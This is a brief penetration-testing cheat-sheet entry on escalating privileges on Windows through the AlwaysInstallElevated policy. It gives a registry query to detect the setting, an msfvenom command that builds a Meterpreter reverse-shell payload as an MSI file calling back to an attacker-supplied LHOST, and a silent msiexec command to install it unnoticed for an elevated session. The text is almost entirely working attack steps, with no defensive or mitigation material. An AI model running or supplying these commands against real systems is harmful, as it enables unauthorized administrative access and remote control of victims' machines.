If windows has been configured to allow msi packages to install with elevated privileges then we can simply create a malicious msi package and run it with those elevated privileges.
Detecting via the registry
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
Note the 0x1 indicating that it is turned on.
Create malicious msi package:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<connect ip> -f msi -o setup.msi
Start a mulit handler in msfconsole and open the msi package in quite mode with no user interface or status messages(stealth)
msiexec /quiet /qn /i C:\Temp\setup.msi
You will now have an elevated meterpreter session.